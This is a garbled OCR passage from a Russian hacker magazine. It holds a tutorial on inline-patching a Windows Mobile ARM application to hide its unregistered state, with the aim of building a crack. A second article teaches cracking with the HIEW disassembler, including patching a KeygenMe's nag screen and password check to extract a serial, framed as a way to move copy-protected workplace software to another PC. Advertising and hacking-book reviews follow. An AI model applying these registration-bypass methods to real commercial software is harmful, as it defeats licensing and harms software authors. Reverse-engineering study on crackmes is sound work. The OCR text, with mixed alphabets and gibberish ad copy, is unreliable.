зываемой в оригинале. Конечно, звучит немного 
странно и сложновато, зато интересно с точки 
зрения реализации. 

Для начала определимся с местом располо- 
жения нашего собственного кода. Видимо, после 
основного кода, перед секцией импорта. Для того 
чтобы узнать адрес последней инструкции, в ли- 
стинге РА перейдем на начало секции импорта 
Листинг 5. НЕХ-код inline-natya (она находится по адресу 1Е000). Смотрим выше и 
видим, что секция кода заканчивается адресом 
10830. Отступим немного и определим начало 
патча на адрес 10840. Теперь запустим любой ре- 
дактор PE, где в конверторе из этого RVA получим 
Листинг 6. Сравнение оригинального и пропатченного файлов File offset. Получается, CC40. 

Наконец-то пришла пора разработки тела in- 
|пе-патча. Здесь советую уделить особое внима- 
ние сохранению параметров функции в стеки при 
входе в подпрограмму (Prolog) и их восстановле- 
нию из стека (Epilog) при выходе из подпрограммы. 
Дело в том, что архитектура ARM поддерживает 
множество способов укладывания данных в стек, и 
если не понимать разницу между ними, быстро за- 
путаешься и приведешь свой КПК к HardReset. 

В итоге, после некоторых усилий, зависящих 
от того самого пухленького багажа знаний, должно 
получиться нечто, похожее на код из листинга 4. 

Если выбросить команду «BL _cinit» или заме- 
нить ее на какой-либо другой вызов, можно скомпи- 
лировать эту программу и таким образом получить 
опкоды. Затем вырезать его в НЕХ-редакторе и по- 
местить в жертву по уже оговоренному адресу 
CC40. Разумеется, профессионалы обойдутся и без 
таких действий и запишут опкоды сразу, по памяти. 


Рисунок 2. Окно диалога в ResHacker 


Итак, ядро написано, осталось привязать патч к 
основной программе, а именно найти для него ме- 
сто вызова. В соответствии с идеей, первый встре- 
тившийся в программе вызов функции должен 
быть подменен и переадресован на наш патч, а са- 
ма функция должна быть вызвана внутри патча. 
Первый переход в программе расположен по ад- 
ресу 1060С, там происходит обращение к некото- 
рой функции _cinit. Реализовать такую переадре- 
сацию можно только вручную, путем замены в ин- 
струкции относительного смещения до этой функ- 
ции на смещение до нашего тм!те-патча. Точно та- 
ким же образом необходимо рассчитать смеще- 
ние из тела патча до функции _cinit. O том, как это 
сделать, можно узнать из врезки. 

После расчета заменяем соответствующие 
смещения в вызовах и получаем: 


Таким образом, конечная версия inline-natya в шест- 
надцатеричном виде будет выглядеть так, как по- 
казано в листинге 5. 

Напоследок возвращаемся в РЕ-редактор, 
в таблице секций (Section Header) меняем раз- 
мер (Virtual Size) секции кода «.text» на «С870» и 


атрибуты секции (Characteristics), добавив свой- 
ство Is writeable. Первое необходимо для кор- 
ректной работы программы в среде WindowsMo- 
bile 2003, второе — для возможности внесения 
изменений в секцию кода во время выполнения 
программы. Вид исправленной секции изобра- 
жен на рисунке 3. 

Наконец-то программа готова к работе и 
можно приступить к написанию крэка, который по 
одному твоему нажатию кнопки повторит все, чего 
мы сейчас добились. После запуска программы на 
реальном устройстве или эмуляторе, убедившись 
в правильности всех расчетов, сравним ориги- 
нальный и пропатченный файлы, чтобы увидеть 
все изменения целиком. Результат сравнения 
представлен в листинге 6. 
> чтобы полностью скрыть «незарегистриро- 
ванность» программы, необходимо также заме- 
нить диалог для ввода имени и ключа на диалог с 
успешной регистрацией. Оставляю это на домаш- 
нее задание, могу подсказать лишь, что заменой 
одного байта там не ограничиться, так как придет- 
ся еще убрать проверки на отсутствие имени, а 
возможно, подставить свои инициалы. 
>» заключение. Такой способ снятия защит 
имеет право на существование, и пусть для этого 
приложения он не очень-то подходит, но в про- 
граммах со скрытым кодом он станет единствен- 
ным способом сочетающим простоту и качество. 
Так что, надеюсь, приведенный пример inline-nat- 
ча когда-нибудь пригодится. 

Кстати, если внимательно изучить сообще- 
ние, которое появляется при неудачной попытке 
зарегистрироваться, можно заметить упоминание 
некоего сайта Handagoo. Пока скажу, что програм- 
ма защищена посредством Handango Dynamic Ве- 
gistration, сгенерировать ключ для нее не соста- 
вляет большого труда, но об этом — в статье 
«Ключевой процесс» AK 
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Рисунок 3. Изменение атрибутов секции 
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ПРИ ПРОГРАММИРОВАНИИ НА АВМ-АС- 
СЕМБЛЕРЕ С ИСПОЛЬЗОВАНИЕМ ОПКО- 
ДОВ ОЧЕНЬ ВАЖНО ПОНИМАТЬ, КАК РАС- 
СЧИТЫВАЕТСЯ ОТНОСИТЕЛЬНЫЙ АДРЕС 
В ИНСТРУКЦИЯХ ВЕТВЛЕНИЯ ТИПА В, ВЕ. 
В ОФИЦИАЛЬНОМ ОПИСАНИИ АРХИТЕК- 
ТУРЫ ARM О ЕГО ВЫЧИСЛЕНИИ ГОВОРИТ- 
СЯ СЛЕДУЮЩЕЕ: 


«THE BRANCH TARGET ADDRESS IS CAL- 
CULATED BY: 


1 SIGN-EXTENDING THE 24-BIT SIGNED 
(TWO'S COMPLIMENT) IMMEDIATE TO 32 BITS. 

2 SHIFTING THE RESULT LEFT TWO BITS. 
3 ADDING THIS TO THE CONTENTS OF THE 
PC, WHICH CONTAINS THE ADDRESS OF 
THE BRANCH INSTRICTION PLUS 8.» 


ПЕРЕВЕСТИ МОЖНО ВОТ TAK: ДЛЯ ПО- 
ЛУЧЕНИЯ АБСОЛЮТНОГО АДРЕСА ПЕРЕ- 
ХОДА 24-БИТОВОЕ СМЕЩЕНИЕ, СОДЕР- 
ЖАЩЕЕСЯ В КОМАНДЕ, СДВИГАЕТСЯ 
ВЛЕВО НА ДВА БИТА, ПОСЛЕ ЧЕГО К НЕ- 
МУ ПРИБАВЛЯЕТСЯ ЗНАЧЕНИЕ РЕГИ- 
СТРА РС, КОТОРОЕ СОДЕРЖИТ АДРЕС 
ТЕКУЩЕЙ ИНСТРУКЦИИ ВЕТВЛЕНИЯ, 
УВЕЛИЧЕННЫЙ НА 8 БИТ. 

ЭТО УТВЕРЖДЕНИЕ ТАКЖЕ МОЖНО ЗА- 
ПИСАТЬ ДВУМЯ ФОРМУЛАМИ: 


Ба — адрес команды ветвления (branch address) 
da — адрес команды назначения (distination address) 


ДЛЯ ПРОСТОТЫ И ЯСНОСТИ РАЗБЕРЕМ 
ПРИНЦИП РАБОТЫ ЭТИХ ФОРМУЛ НА 
ПРИМЕРЕ. ИТАК, НАМ ДАНО: 


СНАЧАЛА НЕОБХОДИМО РАССЧИТАТЬ 
СМЕЩЕНИЕ ОТ БЫВШЕГО ВЫЗОВА 
ФУНКЦИИ _CINIT ДО НАЧАЛА INLINE-NAT- 
ЧА. ПОСКОЛЬКУ ПАТЧ НАХОДИТСЯ НИ- 
ЖЕ ПО КОДУ, ИСПОЛЬЗУЕМ ФОРМУЛУ (1): 


ТЕПЕРЬ ПО ФОРМУЛЕ (2) РАССЧИТЫВА- 
ЕМ СМЕЩЕНИЕ ИЗ ТЕЛА ПАТЧА ДО 
ФУНКЦИИ _CINIT, КОТОРАЯ НАХОДИТСЯ 
ВЫШЕ ПО КОДУ. 


| 
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пенетрация 


hiew’OmM 


УСЛОВИЯХ — 
ЭТО СТИЛЬНО! 


КАК ЧАСТО ТЫ ПОПАДАЛ В СИТУАЦИИ, 
КОГДА ПОД РУКОЙ НЕТ НИЧЕГО, КРОМЕ 
НЕХ-РЕДАКТОРА/ДИЗАССЕМБЛЕРА HIEW, 
А НУЖНО ЗАСТАВИТЬ СОФТ РАБОТАТЬ 
ПО-ТВОЕМУ? С ТАКОЙ ЗАДАЧЕЙ ИНОГДА 
СТАЛКИВАЮТСЯ ГОРЕ-ПРОГРАММИСТЫ 
НА РАБОЧЕМ МЕСТЕ: К КОМПЬЮТЕРУ 
СТАВИТСЯ ЗАЩИТА-ПРИВЯЗКА, НО В ТО- 
ЖЕ ВРЕМЯ АРМ (АВТОМАТИЗИРОВАН- 
НОЕ РАБОЧЕЕ МЕСТО — НЕ ПУТАТЬ С 
АВМ) НУЖНО СРОЧНО ПЕРЕНЕСТИ С ОД- 
НОГО КОМПЬЮТЕРА НА ДРУГОЙ. КОНЕЧ- 
НО, МОЖНО ПРИГЛАСИТЬ АВТОРА АРМ’А 
И ПОПРОСИТЬ ЕГО ОБ УСЛУГАХ, НО 
ОБЫЧНО НА ЭТО БАНАЛЬНО НЕТ ВРЕМЕ- 
НИ И ЖЕЛАНИЯ |GPCH (ADMIN@DOTFIX.NET) 


Все мы привыкли использовать довольно массив- 
ный комплект из различных программ для ревер- 
синга: и отладчик Зо СЕ или OllyDbg, и дизассем- 
блер IDA Pro, и файловый анализатор РЕ, и ре- 
дактор PE Tools, и вообще целая гора специализи- 
рованного и полезного для крэкинга софта. Одна- 
ко стоит ли обзаводиться такой кучей инструмен- 
тов? Для большинства несложных задач по взло- 
му вполне хватит НЕХ-редактора и дизассембле- 
ра. Сейчас мы поговорим как раз о том, как иссле- 
довать софт только с помощью HIEW. 


Этот дизассемблер был выбран неслучайно: всегда 
можно без труда найти его в локалке любого круп- 
ного предприятия, а в его состав включен хороший 
НЕХ-редактор (вот и причина высокого спроса). 
Итак, ты сидишь на работе. Кроме компьютера и 
локалки, под руками ничего нет. Поставлена зада- 
ча банально запустить неработающий софт на сво- 


ем (или любом) компьютере. Посмотрим, как в этом 
замечательном дизасме проделываются разные 
повседневные реверсерские операции. 

> главное для реверсера — умение локализо- 
вать компилятор/упаковщик, чтобы знать, с чем 
имеешь дело и какой подход выбрать. Конечно, 
когда найдешь упаковщик, ты будешь обязан, как 


минимум, снять его, и тут без автораспаковщика 
точно не обойдешься. Правда, обычно в узкоспе- 
циализированном софте, который пишут по зака- 
зу для предприятий, не используются никакие упа- 
ковщики: клиент один-единственный, он всегда 
платит, поэтому программист делает защиту толь- 
ко чтобы потом ее никому не перепродали и чтобы 
его услуги были востребованы в будущем. Да, хо- 
рошая идея, но порой самому клиенту приходится 
апгрейдить компьютер — именно тут наступает 
время задуматься. Локализация компилятора бу- 
дет не менее полезна, так как, к примеру, для 
Delphi и VB потребуются разные знания и подго- 
товка :). Открывай программу в HIEW и смотри на 
гору АЗСИ-символов. Что тут понятно? 

Дважды жмем <Ещег> и смотрим на более 
понятный дизассемблированный код. Чтобы он 
стал еще понятнее, надавим <F8> и <F5> — HIEW 
перейдет на участок кода, прописанный в ориги- 
нальной точке входа. Внимательно взглянув на 
этот код, уже понимаешь, на чем он написан. К 
примеру, для Delphi-nporpamm код будет выгля- 
деть как на листинге 1. 

Действительно, невозможно не узнать его: 
просто несколько Са|-вызовов, стандартных в 
Delphi-nporpammax. Если вновь перейти в тексто- 
вый режим, нажать и подержать <PgUp> в самом 
верху, то сможем посмотреть на названия секций. 
Вот примерный расклад для Оерн-программ, не 
тронутых защитой: 


Итак, с Delphi определились, теперь поговорим о 
C++ Builder. Здесь сложностей намного меньше. 
На оригинальной точке входа всегда присутствует 
код (листинг 2). 

Байты, расположенные между |тр’ом и 
mov’om: "C++HOOK". Тоже все просто :). Что же 
насчет Basic’a? Он всегда имеет только две ко- 
манды на ЕР: 


Здесь мы наблюдаем, что по адресу 0004016ЕС 
всегда присутствует VBHeader, начинающийся с 
сигнатуры «VB5!». 

> PE уже не нужен. Что там с упаковщиками? 
Можно даже не смотреть на точку входа :). Доста- 
точно посмотреть на ЕХЕ-заголовок в текстовом 
виде. UPX пихает в начало первой секции сигнату- 
ру «UPX!», а секции обзывает «.UPXO», «.UPX1», 


«.гэгс», причем секций насчитывается три вне за- 
висимости от того, сколько их было до упаковки. 

Если же взглянуть на точку входа (листинг 3), 
то откроется код, довольно стандартный для всех 
версий UPX’a. 

Подробнее о самом алгоритме распаковки и 
восстановлении импорта читай в статье «Об упа- 
ковщиках в последний раз» (лежит на 
www.wasm.ru), Я же продолжу рассказ об определе- 
нии других упаковщиков. Следующим по распро- 
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страненности является ЕЗ@ и (с недавних пор) 
Upack. Они узнаются очень просто. Смотришь на 
текстовое представление ЕХЕ-заголовка — он 
крайне оптимизирован, и обычно там нет столь- 
ких нулевых байт мусора, сколько оставляют дру- 
гие пакеры. Upack даже запихивает импорт прямо 
в DOS Header после МХ :). 

Кстати, есть еще один хитрый метод легко 
отличить М$-компиляторы от Войапа’овых по при- 
сутствию «Rich»-ctpoku после DOS Header’a. 
> лучшие помощники крэкера, стринг-рефе- 
ренсы, представляют собой перечень всех строко- 
вых данных, которые встречаются в программе, и 
адресов, где происходит обращение к этим стро- 
кам. Они есть и в HIEW’e! В НЕХ-режиме ставишь 
курсор на начало любой строки и нажимаешь <Е6> — 
сразу перейдешь на первое обращение к соот- 
ветствующей строке! Поиск русских строк здесь 
тоже к твоим услугам. В общем, HIEW — на- 
стоящий рулез. 

Жмем <F7> и пишем «Программа не зареги- 
стрирована». <Enter>. Если нужно искать все ме- 
ста, где встречается строка, то <Shift> + <F7>, и HI- 
EW найдет следующий адрес, где имеется строч- 
ка. Так каким образом он ищет русские строки, 
особенно если они могут быть и в DOS-, и в win- 
Чо\/$-кодировке? Ты сам даешь ему все нужные 
знания. Перед поиском необходимо нажать в тек- 
стовом режиме <F8> и выбрать кодировку. Имен- 
но с ее помощью HIEW и будет искать строку. 
> порой, когда всматриваешься в дизассем- 
блерные листинги, так и хочется перейти по ад- 
pecy, по которому указывает jmp, call или даже 
mov. HIEW и тут не подведет: каждому адресу 
на экране присваивается уникальное число, на- 
жимаешь его на клавиатуре и переходишь куда 
надо. Вот пример: 


(1) и (2) — те самые числа. Чтобы перейти по ука- 
занным адресам, просто набираешь их на кла- 
виатуре (они могут быть выражены и буквами, 
если переходов больше девяти). Вообще цифро- 
вость задается в hiew7.ini, там тебе предоставля- 
ется воля вытворять что угодно, даже китайские 
иероглифы вписать. 

Теперь остановимся на перемещениях по 
EXE вручную. По <F5> переходишь на указанный 
адрес. Притом, если просто ввести адрес, то пере- 
местишься по Offset’y. Если поставить точку пе- 
ред адресом, HIEW перейдет по виртуальному ад- 
ресу. Очень удобно. Даже в коде эти адреса мож- 
но переключать нажимая <Alt> + <F1>. Опять же 
не напрягаясь, ты переходишь к началу нужной 
секции: заходишь в РЕ-заголовок нажав <F8>, за- 
тем давишь <F6> и, выбрав нужную секцию из 
списка, оказываешься в ее начальном адресе. А 
что если захотелось перейти в начало таблицы 
импорта или TLS? Искать самому? Нет. <F8>, за- 
тем <F10>, и ты переносишься к таблице полей 
МТНеадега. В нем просто выбираешь нужное по- 
ле и нажимаешь <Enter> — переместишься мгно- 
венно :). Вот так старый добрый НИЕМ! помогает в 
нашем нелегком деле. 
> исследовать мало — нужно править код, 
причем не все способны запомнить машинные ко- 
ды и не все могут ориентироваться в составлении 
mod/rm-cbnaroB (и кодировать регистры в уме). 
Править в НЕХ-редакторе — немного неудобный 
метод (хотя я, например, написал весь движок 
DotFix FakeSigner’a чисто в HIEW и уже привык ко- 
дировать в уме :)). Конечно же, и тут НЕМ! не 
оставит тебя в беде, на помощь придет его мощ- 
ный ассемблер! Чтобы править код, нажимаешь 
<F3>, затем дрожащим пальцем тыкаешь в <Tab>... 


О чудо! В появившейся текстовой строке можно 
писать команды прямо на ассемблере. Нажатие 
<Enter> позволяет еще и начать набор следующей 
команды. 

Как видишь, жизнь не так сложна, как каза- 
лось, когда ты начинал читать эту статью :). Кста- 
ти, насчет ошибок. Практически любой введенный 
код можно отменить нажимая <F3>. С помощью 
<F9> ты запишешь в файл правильно написанное. 
Только вот незадача, после записи файл не запу- 
скается и приходится выходить из HIEW, чтобы 
снять залоченность. Но решение вновь находится. 
Открываем hiew7.ini и ищем строку «ReopenAfterE- 
dit», ставим ее в «Оп». Теперь, после редактиро- 
вания, файл будет закрываться и вновь откры- 
ваться для чтения, что позволит запускать его по- 
сле каждой правки. Я спросил у Евгения, зачем он 
не сделал то же самое в настройках по умолча- 
нию. Угадай, что ответил автор HIEW. Да, пра- 
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Начало структуры, описывающей любую 
УВ-программу 


UPack жмет программу так, что от заголовка оста- 
ется только MZ, после которого идет импорт. 
Жаль, что антивирусы не разделяют эту идею оп- 
тимизации 


Вильно: «Чтобы люди читали help». Так что мораль 
простая: читай help, комментарии ко всем строкам 
hiew7.ini, и да даруется тебе знание. 

>  декриптуем ХОН. С некоторых пор повелось 
так, что каждый кодер, разобравшийся с РЕ-фор- 
матом, пишет свой криптор. Как ни странно, их де- 
ло процветает и появляется все больше программ, 
способных шифровать ЕХЕ и защищать его от 
взлома (якобы). В основном они используют алго- 
ритм XOR :), и поскольку он обратим, для расши- 


фровки остается только узнать пароль и обрабо- 
тать им шифрованный кусок кода. 

Иногда анализ программы позволяет узнать, 
каким ключом дешифруется тот или иной блок. И 
как же расшифровывать? В уме? Всю секцию ко- 
да? «Не смешите», — сказал ты и пошел по-бы- 
строму писать программу на С для решения этой 
задачи. Стоп! Все это уже есть в НЕХ-редакторе 
HIEW. В режиме редактирования ты всего лишь 
надавливаешь <Ctrl>+<F8> и задаешь ключ, потом 
<F8>, ксоря блок за блоком. Зажимаешь <F8> и 
держишь, пока не раскриптуется! 
> — как бы ни был силен XOR, он не всегда под- 
ходит для шифровки-дешифровки. Однако не 
спеши грустить — HIEW позволит тебе задавать 
алгоритм шифровки самостоятельно. Для этого 
нажимаешь <F3>, чтобы перейти в режим редак- 
тирования, затем <F7>. Отроется диалог набора 
кода. Забиваешь туда алгоритм криптовки и ис- 
пользуешь. Как писать криптоалгоритм, объяс- 
нено в справке. Написано нормально, разобрать- 
ся можно ;). 

Для большей простоты и наглядности возь- 
mem KeygenMe ру Fabsys. Тяни его с crackmes.de 
или с диска к журналу. Начнем исследовать. От- 
крываем Кеудеп.ехе в hiew (листинг 4). Что видим? 

По адресу 40822А красуется вызов нагскри- 
на :). Лучший выход — пропатчить его, для чего 
устанавливаешь курсор на 40821С и жмешь <F3>, 
чтобы перейти в режим правки. Затем <Tab> для 
вызова окна ассемблера. Там пишешь «jmps 
.40822F» (без кавычек). Команда jmps, в отличие 
от jmp, сгенерит short jmp, занимающий всего два 
байта. Точка перед адресом ставится потому, что 
это VA, а He Offset. 

Запустим для проверки. Ура! Hara как He 
бывало. И тут начинаются разборки с проверкой 
пароля. Я ввел имя «СРсН», пароль — «12345». 
При нажатии на кнопку Сепегае видим сообще- 
ние «BaD BoY». Снова переходим в HIEW. В ре- 
жиме дизассемблера <F8>, затем <F6> для выво- 
да секций. Выбираешь первую секцию. Как толь- 
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.0040820С: 55 push 
.0040820D: 8BEC mov 
.0040820Е: 83C4F0 add 
00408212: B8C4814000 mov 
.00408217: E8FOC2FFFF call 
.0040821С: 6A40 push 
.0040821E: 684C824000 push 
.00408223: 6854824000 push 
.00408228: 6A00 push 
.0040822А: E841C4FFFF call 
.0040822Е: 68047F4000 push 
Листинг 5 

.00408067: 6848814000 push 
.0040806С: 53 push 
.0040806D: E81EC6FFFF call 
.00408072: 6A00 push 
.00408074: 6874814000 push 
.00408079: 687C814000 push 
.0040807Е: 53 push 
.0040807F: E8ECC5FFFF call 
00408084: EB20 jmps 
.00408086: 6A00 push 
.00408088: 6888814000 push 
.0040808D: 6894814000 push 
00408092: 53 push 
.00408093: E8D8C5FFFF call 
.00408098: EBOC jmps 


ко переведешься в ее начало, начинай поиск: 
<F7> и ввести «BaD Во\». Вот нашел, и тут же 
<F6>, чтобы HIEW перешел по адресу, откуда 
идет обращение к этой строке. В результате ви- 
дим содержимое листинга 5. 

Логично, что теперь последует попытка уз- 
нать, откуда идет обращение к 408086 адресу. 
Чуть выше находится его вывод информации о 
том, что пароль правильный. Следовательно, где- 
то есть переход на вывод информации либо о вер- 
ном пароле, либо о неверном. Ставим курсор на 
адрес 408086 и жмем <F6>. Почти мгновенно, как 


Как настоящие ассемблерщики, пишем программу без всяких сред программирования 


ebp 

ebp,esp 

esp,OFFFFFFFO ;'?' 

eax ,0004081C4 --?1 
SAS e Sen 

000000040 ;'@' 

00040824С ;'Rules' 
000408254 ;'KeygenMe and de 
0 

MessageBoxA ;user32 --?5 
OO0O0407F04 --?6 

000408148 ;'Prolixe KeygenM 
ebx 

SetWindowTextA ;user32 --?2 
0 

000408174 ;'Winner' 
00040817C ;'GooD BoY' 

ebx 

MessageBoxA ;user32 --?5 
.0004080А6 --?6 

0 

000408188 ;'Wrong Way' 
000408194 ;'BaD Boy' 

ebx 

MessageBoxA ;user32 --?5 
.0004080А6 --?6 


по велению волшебной палочки, НЕМ! перенесет 
тебя на строку, где идет обращение к адресу 
408086 (листинг 6). 

Попробуем исправить переход пе Ha je по 
адресу 408055. Запускаешь КеудепМе и вво- 
дишь любой пароль — программа будет зареги- 
стрирована. HIEW просто рулез! Несмотря на 
это, все еще не достигнута цель — получить ра- 
бочий ключ. Увы, HIEW не настолько мощен, что- 
бы реверсить в нем алгоритм и писать Keygen. 
Для того чтобы сделать полноценный Keygen, по- 
требуется отлаживать программу. Оно нам на- 
до? Может, лучше просто попытаться получить 
серийник на свое имя? Попробуем! Поизучаем 
код, который идет перед пе. На пару экранов вы- 
ше обнаружится содержимое, которое ты мо- 
жешь видеть на листинге 7. 

Сравниваем [ebp][-00000204] с нулем. Если 
«равно», выводим «Неверный серийник». Логично 
было бы предположить, что серийник лежит по ад- 
ресу [ebp-204]. Смотрим ниже. Теперь с нулем 
сравнивается [ebp-204] и выводится сообщение о 
неверном имени пользователя. Ага, наконец выяс- 
нено, что имя находится в [ebp-204]. Внимание на 
листинг 8. 

Н-да, ясно: без отладчика не разберешься, 
какой Call и какую функцию выполняет. Все же 
взглянем на каждый из них. Похоже, первый про- 
сто переносит имя пользователя в другую пере- 
менную. Второй же криптует ее. Пролистаем код 
по адресу 407E14. О чудо: 
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Если не подключать к делу дебаггер, то этот код 
ты поймешь только логически. Как я подозре- 
ваю, пароль может складываться как: 'HZF-' + 
[ebp][-OC] + '-GFD'. Проверим ЭТО. По листингам 
выше мы знаем адрес МеззадеВохА в IAT. Так и 
вызовем его, а в параметрах укажем [ebp]|[-OC]. 
Прямо после 


жми <F3> и набирай. У меня получилось нечто, по 
виду напоминающее содержимое листинга 9. 

Теперь при вводе неверного серийника вы- 
водится середина верного. Слева добавим к ней 
'HZF-'. Справа — '-GFD'. Получим верный код. Пра- 
вда, автор не позаботился о том, чтобы код всегда 
имел печатаемые символы, так что ключ из нор- 
мальных буковок будет не на каждое имя. Впро- 
чем, уже не наши проблемы — цель, получение 
пароля, достигнута. 
>» — заключение. Немного познакомлю читателя 
с тем, что грядет в будущих релизах программы. 
Главное, что автор действительно планирует, — 
поддержка AMD64. Эта линейка процессоров уже 
стала поистине народной и получила широкое рас- 
пространение в мире. Насколько мне известно, да- 
же Microsoft в Win64 делает основной упор на про- 
цессоры AMD. В последнее время стало появлять- 
ся все больше программ и даже драйверов, ском- 
пилированных в формате AMD64, поэтому в лю- 
бом случае необходимо расширять ассемблер и 
дизассемблер HIEW’a. 

Никаких планов насчет IA64 пока не строит- 
ся. Тут хотя бы AMD64 реализовать. Насчет .МЕТ и 
ARM Sen обещал подумать, но больше на перспек- 
тиву, так как разбираться с абсолютно новым ас- 
семблером и псевдокодом не так просто. 

Помимо того, что сказано, автор дизассем- 
блера планирует публикацию полного Plugin 
SDK, чтобы любой желающий мог разработать 
плагин для расширения функционала HIEW’a. К 
примеру, сделать скриптовый язык для автома- 
тизации действий в НЕ\/ или, скажем, анализа- 
тор компилятора/упаковщика. В общем, если 
SDK выйдет на сцену, думаю, за плагинами не 
заржавеет. GUI, скорее всего, не будет, так как 
консольный инструмент гораздо удобнее win- 
dow’oro, что уже доказано ЕАН`ом. Так что перс- 
пектив много — осталось ждать. Буду верить, 
что Евгений не подкачает. А тебе желаю успехов 
в исследованиях. Надеюсь, эта статья обогатила 
твои знания о HIEW, таком полезном инструмен- 
те реверсера, и показала лучшие способы по ав- 
томатизации разных задач № 
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Думаешь, что посмотреть сегодня вечером? 
Выбираем кино c TOTAL DVD! 


Вес кино = читай о блоюбастерах месяца, Pate INAA о лентах 
PMECT? со зоездаьии, выбирай на какой Cedar пойти 


* 


Все o OVO = cae nye pen месяца, Gores 50 обзоров, море 
интервью 


Г 


и немного о темнологиях будущего! Телевидение высокой 
четкости, плазмы Meee Apyrae! 

Total DVD = ультимативный журнал для киноманов! 
Bl hal yA Re pe CY Cop noeesiend с Bee 


а We EH 


фриске COST Re EC Tne NL Bee pee ha, Oe ooe TRH Но ecetoon 


ME KATH Meee к, LL ee 


Ищешь себе технику для домашнего ки нотеатра? 
‘ ‘Y= самый лучший гид по аудио- 
Видео- новинкам 


Все о Hi-Fi, High End и Home Cinemal 


Nga oo инстрекщин пк с 
домашнего кино 


уставпению и инстапляцщии системы 


Ty wwe онстемы и коагюненты месяца = рай для новичков. болям 99 
CaMRX HOR МОДЕРОЫ В ОЦенонаных и сравнительных тестах 


Готовые системы, интервью, самые свежие новости индустрии 
Всегда на пезвми прогресса! 


Выбираем домашний кинотеатр сжурналом «DVD Эксперт»! 
Сейчас это стильно, это модно, это доступно, это просто! 

FOt 7 ApH Reine Прето CA Don patio Hie Cpe rtH band 

РЕ TP oe RAT Л eT ран я Ал | ere (IOS м р тук на TRE 


CRT Te Tye Ord LL i ed I ST) eet ee ДНИ oe 1 SE LW Me Dorel 


oH Hae 


78 | SPECIAL DELIVERY 


обзор 
КНИГ 


ЧТО ПОЛИСТАТЬ 


КАК МЫ ОТБИРАЕМ КНИГИ 

В ОБЗОР? БЕРЕМ СПИСОК КНИГ, 
КОТОРЫЕ ЕСТЬ НА СКЛАДЕ (НЕСКОЛЬКО 
ТЫСЯЧ НАИМЕНОВАНИЙ). ДЕЛАЕМ 
ВЫБОРКУ ПО ТЕМЕ НОМЕРА, ПОТОМ 
ОТБРАСЫВАЕМ УСТАРЕВШИЕ 
ЭКЗЕМПЛЯРЫ И ДУБЛИ. ЛУЧШЕЕ 
ПОПАДАЕТ В ЖУРНАЛ 1АНАРЕЙ КАРОЛИК 


EASY 


Основы защиты 
информации: 
учебное пособие 
для студентов 
высших учебных 
заведений 


М.: Издательский центр 
«Академия», 2006 
Куприянов А.И. / 256 страниц 
Разумная цена: 209 рублей 


Информация может быть 
представлена как угодно, не 
только в виде файлов на вин- 
честере :). Нужна защита не 
только самой информации 
(от утраты, искажения, несан- 
кционированного доступа и 
использования), но и защита 
ОТ ложной/избыточной ин- 
формации. В число жертв 
атаки могут попасть и инфор- 
мационные системы, и сред- 
ства, каналы, сети или среды. 
Каждый вид атаки разбирает- 
ся подробно вплоть до физи- 
ки процессов и формул, на 
полученной основе выбирают 
способ защиты: кодирование 
для защиты от искажения по- 
мехами, обратная связь для 
адаптации к помехам, шиф- 
рование для защиты от не- 
санкционированного доступа, 
стойкость к дезинформирую- 
щим помехам и множество 
других интересных нюансов. 
Побольше бы наглядных при- 
меров и описания попроще — 
цены бы книжке не было... 
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Если заинтересовался, 
можешь заказать любую 
книгу из обзора 

(по разумным ценам), 

не отрывая пятой точки 
от дивана или стула, в 
букинистическом интер- 
нет-магазине «О$-книга» 
(www.osbook.ru), Книги 
для обзора мы берем 
именно там 


MEDIUM 


Фрикинг не для 
дилетантов: пособие 
по взлому и защите 
телефонных линий 


М.: ЗАО «Новый 
издательский дом», 2005 
Борис Леонтьев / 528 страниц 
Разумная цена: 273 рубля 


Фрикер — это телефонный 
хакер. Чтобы стать фрике- 
ром, не обязательно ломать 
АТС, достаточно обладать со- 
ответствующими знаниями, 
которые, кстати, пригодны 
для использования и в мир- 
ных целях. 

Книга посвящена имен- 
но безопасности. Подробно 
06 АТС, как отправить факс 
бесплатно в любую точку 
мира, что для этого понадо- 
бится. Как перепрограммиро- 
вать пейджер и пользоваться 
им практически бесплатно. 
Недокументированные воз- 
можности сотовых телефо- 
нов и их взлом. И все в та- 
ком духе... 


EASY 


Введение 
в хакинг 


М.: ЗАО «Новый 
издательский дом», 2005 
Максим Левин / 176 страниц 
Разумная цена: 112 рублей 


Хакерами не рождаются! Так 
что можешь без особых проб- 
лем освоить их основные 
уловки: спуфинг, снифинг, 
«мусорные бачки», ловля на 
«дурачка», взлом паролей, 
ложные ОМ$-запросы и мно- 
гое другое, — все есть в этой 
книжке. Прибавь прикольный 
СТИЛЬ «на ты», читается легко 
и просто. Главы очень ма- 
ленькие и перетекают одна 

в другую, по мере прочтения 
начинаешь понимать сленг 
хакеров, их цели и приемы 
работы. 


Защита от хакеров 
средствами хакера 


М.: ДМК Пресс, 2005 
Проект Honeynet / 312 страниц 
Разумная цена: 197 рублей 
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Honeynet — специальная 
компьютерная сеть (каких 
много), работающая как при- 
манка. Хакеры находят ho- 
neynet и тратят драгоценное 
время, а создатели «прима- 
нок» убивают двух зайцев: 
отводят удары от реальных 
сетей и беспрепятственно со- 
бирают и анализируют ин- 
формацию о средствах взло- 
ма и поведении хакеров. Кни- 
га рассказывает: как создать 
подобную «приманку», что 

и как собирают и анализиру- 
ют с их помощью, возможные 
проблемы и решения. Уни- 
кальная возможность посмот- 
реть на хакеров с их же пози- 
ций :). А со стороны всегда 
виднее... 


Компьютерные 
вирусы изнутри 
и снаружи 


М.: ЗАО «Новый 
издательский дом», 2005 
Максим Левин / 176 страниц 
Разумная цена: 112 рублей 


Вирусы привыкли распрост- 
ранять и лечить, но мало 
кто пытался разобраться, 
что представляет собой ви- 
рус, как он функционирует 
и как чужеродный код внед- 
ряется в исполняемый 
файл. Если разберешься, 
сможешь определять, на- 
сколько надежны антивиру- 
сы и можно ли обхитрить их. 

Очередное творение 
Криса Касперски, рассчи- 
танное на тех, кто свободно 
говорит на С :), умеет дизас- 
сем-блировать машинные 
коды и часто изучает исход- 
ные тексты. Вирусы не стоят 
на месте, они прочно обос- 
новались в Мпих, научились 
скрывать свое присутствие 
в системе, пробили новые 
дыры в брандмауэрах, адап- 
тировались к Longhorn... Как 
защитить информацию от 
разрушения? 


EASY 


Криптографические 
методы защиты 
информации: 
учебное пособие 
для вузов 


М.: Горячая линия — 
Телеком, 2005 

Рябко Б.Я. / 229 страниц 
Разумная цена: 218 рублей 


Криптография и интересна, 
и сложна. Прежде всего, она 
включает в себя математику 
и кучу формул, и чтобы по- 
нять идеологию криптогра- 
фии, придется начинать с са- 
мого нуля. Вполне подойдет 
учебное пособие для вузов :). 
Главное — что издание 
